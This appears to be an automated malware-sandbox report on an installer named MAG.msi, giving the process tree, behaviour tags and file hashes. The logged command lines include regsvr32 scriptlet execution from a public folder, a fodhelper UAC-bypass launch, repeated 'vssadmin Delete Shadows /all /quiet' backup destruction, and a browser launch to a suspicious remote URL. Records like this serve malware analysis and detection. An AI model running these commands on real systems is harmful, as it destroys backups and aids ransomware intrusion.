msiexec.exetaskhostw.exesihost.exesvchost.exeMsiExec.execmd.exemsedge.exedescription pid process target process PID 2344 wrote to memory of 3300 2344 msiexec.exe srtasks.exe PID 2344 wrote to memory of 3300 2344 msiexec.exe srtasks.exe PID 2344 wrote to memory of 748 2344 msiexec.exe MsiExec.exe PID 2344 wrote to memory of 748 2344 msiexec.exe MsiExec.exe PID 2492 wrote to memory of 2336 2492 taskhostw.exe regsvr32.exe PID 2492 wrote to memory of 2336 2492 taskhostw.exe regsvr32.exe PID 2384 wrote to memory of 3052 2384 sihost.exe regsvr32.exe PID 2384 wrote to memory of 3052 2384 sihost.exe regsvr32.exe PID 2396 wrote to memory of 1876 2396 svchost.exe regsvr32.exe PID 2396 wrote to memory of 1876 2396 svchost.exe regsvr32.exe PID 748 wrote to memory of 1404 748 MsiExec.exe cmd.exe PID 748 wrote to memory of 1404 748 MsiExec.exe cmd.exe PID 1404 wrote to memory of 4984 1404 cmd.exe msedge.exe PID 1404 wrote to memory of 4984 1404 cmd.exe msedge.exe PID 4984 wrote to memory of 4816 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 4816 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1872 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 4400 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 4400 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1528 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1528 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1528 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1528 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1528 4984 msedge.exe msedge.exe PID 4984 wrote to memory of 1528 4984 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding B5F14857B5BDF5100937F8735977CDBC2⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://2e80a6c8ameemybio.cryless.info/meemybio^&1^&43548853^&81^&417^&22190413⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://2e80a6c8ameemybio.cryless.info/meemybio&1&43548853&81&417&22190414⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x11c,0x120,0x40,0x124,0x7ff9211946f8,0x7ff921194708,0x7ff9211947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3288 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5248 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4152 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6283d5460,0x7ff6283d5470,0x7ff6283d54806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4884 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3588 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2180,1442593067463701639,13971407344778123529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:85⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\AdvertisingFilesize
24KB
MD54e9962558e74db5038d8073a5b3431aa
SHA13cd097d9dd4b16a69efbb0fd1efe862867822146
SHA2566f81212bd841eca89aa6f291818b4ad2582d7cdb4e488adea98261494bdcd279
SHA512fcd76bca998afc517c87de0db6ee54e45aa2263fa7b91653ac3adb34c41f3681fbe19d673ae9b24fdf3d53f5af4e4968e603a1eb557207f8860ac51372026b2e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\AnalyticsFilesize
4KB
MD5fad197d6ffd32d1268b9e7e8d13ab32a
SHA1b0129887a75965bb2ef56a2c39d3231e5b87265d
SHA2564e446af739e1a06b48a73607e9441bc4aa34ceafd808ff845864408179a4d2c3
SHA51201d9f588bfa315e316ff0ff4a15a0a49144fd77ee89960882cd528d7f7a277b086667cea2357c3ca2bd16a2b3f4aeb7fcaf473501b499101be68acbe1e0126cb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\CompatExceptionsFilesize
660B
MD5900263477e1368869fbf1be99990c878
SHA1e56e199aa4119f3cc4c4d46f96daea89bbf9685a
SHA2567f660d9db521646e9c6510d844b6c6ea26716b620c46f34edaf7ce318a9473e4
SHA5121035b388b4b00c744824d13c5ef48118d88abbb53e9d76896a2d96a2a127a7739c119e781d7d5f0b8d910e10539c0c502c9f937fc2487747c65e7285f4b1e6d2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\ContentFilesize
6KB
MD594c183b842784d0ae69f8aa57c8ac015
SHA1c5b1ebc2b5c140ccbb21cd377ca18f3c5d0b80cd
SHA256aa5c4d50684aa478d5982e509cbf1f8347fbc9cc75cb847d54915c16c3a33d25
SHA5125808ddb81657acf4712fa845c95aacbab32a414ffda3b9d1218637e2d53bd3e0d6b95c872779ead6eaa13b4d2d563494ad5587337958bd17f1e791fad5d822fb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\CryptominingFilesize
1KB
MD58c31feb9c3faaa9794aa22ce9f48bfbd
SHA1f5411608a15e803afc97961b310bb21a6a8bd5b6
SHA2566016fd3685046b33c7a2b1e785ac757df20e7c760abe0c27e1b8b0294222421d
SHA512ba4b5886c04ba8f7a7dbb87e96d639783a5969a245de181cf620b8f536e3ac95bbd910cd2f1f6aae6c3cd70fc1ef6209dc10d2b083ec51861b51d83f95811baa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\EntitiesFilesize
68KB
MD50d37c9d98f35f2c6524bd9b874ec93ed
SHA187d2d1149db8a1c2d91bc8d2d6e2827d2d8850f5
SHA25619ce05d2716fae5d0d6e2067a7a624c0fa7f8b02486d9469861fd30cf1c499ac
SHA51268e73804a144cbe7287c2136ab1986c4e2a97c497d5bfd36ef5db0f1fb1b4a28839d63d83019082ce61af9b42853934888ce05d6b28350742776b97fa310a575
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\FingerprintingFilesize
1KB
MD5b51076d21461e00fcbf3dbd2c9e96b2b
SHA131311536cf570f2f9c88d21f03a935ac6e233231
SHA25621a8d3e85d76761a1aab9dca765efef5dfa08d49db037befd91833e4639dd993
SHA5123e193220ddddc47ecea32a2f777e55faa12c7a8052323455c8d7a89c01048155c77ae009fd0f5bebea89f1fae4a88b6b3ceca4e808064f474ea5b3a9497598cb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\OtherFilesize
34B
MD5cd0395742b85e2b669eaec1d5f15b65b
SHA143c81d1c62fc7ff94f9364639c9a46a0747d122e
SHA2562b4a47b82cbe70e34407c7df126a24007aff8b45d5716db384d27cc1f3b30707
SHA5124df2ce734e2f7bc5f02bb7845ea801b57dcf649565dd94b1b71f578b453ba0a17c61ccee73e7cff8f23cdd6aa37e55be5cb15f4767ff88a9a06de3623604fbf0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\SocialFilesize
999B
MD5152b745da17397ed5a2f3059bb157600
SHA147bf4e575ba1acf47dcc99f1800f753b4cc65ef6
SHA256ef994058a637f7b1b47c31c8670977084d1f86cc21a196920aa87f8ed31e98e8
SHA5124984a8a46eb452b3c62f2c2ca8c9d999de37c39895ad9a9ed91d12a7731b1cd227f335829f7a6927f19cd8bf4dd7d6749fc853461a46fc97853d5b9e23171d31
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\AdvertisingFilesize
459B
MD5d024831cae8599f0edee70275d99e843
SHA169e08b543802b130da5305cbb0140bda5601079c
SHA2560b75817b9ce2164f52e537c66bbff0fe53024bf9a00fb193efd63fe48f34a978
SHA512ee1096446f6a17bc3fde9aadb418ca4b2db5132cdde1e429300487aaf4d8b9865a3bbc95d3a3198cde137a6395f69c035b74a72f74edc22a490bccc3320b0b03
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\AnalyticsFilesize
50B
MD54cefbb980962973a354915a49d1b0f4d
SHA11d20148cab5cdadb85fad6041262584a12c2745d
SHA25666de8db363de02974a1471153112e51f014bb05936ce870c433fd9a85b34455a
SHA5126a088bbc6c40454165ddee3183667d2997dca5fcc8312f69e3c2397e61255e49b5146b24c2c64cd3c8867289e3abfdf1155e47722fdd8276f96d51e8f311d4b0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\ContentFilesize
36B
MD57f077f40c2d1ce8e95faa8fdb23ed8b4
SHA12c329e3e20ea559974ddcaabc2c7c22de81e7ad2
SHA256bda08f8b53c121bbc03da1f5c870c016b06fa620a2c02375988555dd12889cdf
SHA512c1fb5d40491ae22a155a9bd115c32cbe9dbcba615545af2f1a252475f9d59844763cd7c177f08277d8ef59e873b7d885fda17f2a504d9ec2c181d0f793cb542b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\CryptominingFilesize
32B
MD54ec1eda0e8a06238ff5bf88569964d59
SHA1a2e78944fcac34d89385487ccbbfa4d8f078d612
SHA256696e930706b5d391eb8778f73b0627ffc2be7f6c9a3e7659170d9d37fc4a97b5
SHA512c9b1ed7b61f26d94d7f5eded2d42d40f3e4300eee2319fe28e04b25cdb6dd92daf67828bff453bf5fc8d7b6ceb58cab319fc0daac9b0050e27a89efe74d2734e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\EntitiesFilesize
2KB
MD5ba60431b366f83677a5bf1a2e4601799
SHA183f828c27de5429e25c38c36ba77e069d5c7b2de
SHA256ab895ef5f75efd49dbb4fcdf7529e50ca622d13433e067bcf8a1f1127a944da3
SHA512aa9ff0374fb3d4bff7ee5a78dd5ace340da4af1a844f453a40b2723a91b32e6e3f4bd736fb3f3cb210b016109660a7b5cc8440901c6bb410e61530286a4e0200
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\FingerprintingFilesize
110B
MD5a004023825237dadc8f934758ff9eaf2
SHA1c981a900b5ce63884635cedfe5ba722416021cb2
SHA2563c4e82aae615a7bed985b4544afecb774b728df1cc9f7561ea25b97482119ef7
SHA512e49667fca51a6497ccae9b881d679b857c025f2945ab93c9a6769b1c0a632329993daefab6eda9ed70a32a75630d7b3d93dda5acda8ff87ffe5f090ca7b35e4f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\OtherFilesize
75B
MD5c6c7f3ee1e17acbff6ac22aa89b02e4e
SHA1bdbd0220e54b80b3d2ffbbddadc89bfbb8e64a8b
SHA256a2f9f27d6938a74979d34484bced535412969c2533dc694bfa667fe81d66d7d4
SHA51286ed28ffdd00b4a397a20968792fcd30dd4a891a187a7789c00c88b64689b334a11fa087eb54ccee813c181cf891b43184dde7af9a6f33caed2a71e2c445a7b4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\SocialFilesize
35B
MD5976b1cf7e3442f88cd8ba26d3f0965bb
SHA1b75438dc71de4ac761d94a215ddbffadcd1225b0
SHA256decde67630f29fc003cb1f2ccbd7371a05079985a9cce93ec93c4fadd8dc5541
SHA512d0472fed72e1eb0a7747a693a0e654fbe92dd028db3cc42377810d90474dd4099ac981cca333eb52c18e75ed04a1f1f79f3bf5957fe8b16086f1252b3454b8d5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\StagingFilesize
519B
MD59ca5eb41a53645be63d247ad8a9a7869
SHA12e98b04b5a2efb04d20bc7fe51b05c4e4841205b
SHA256f67c58a61ddef715b01debc66ddc0e3c365295ac9870328f6b8bdbcb02a6b8c9
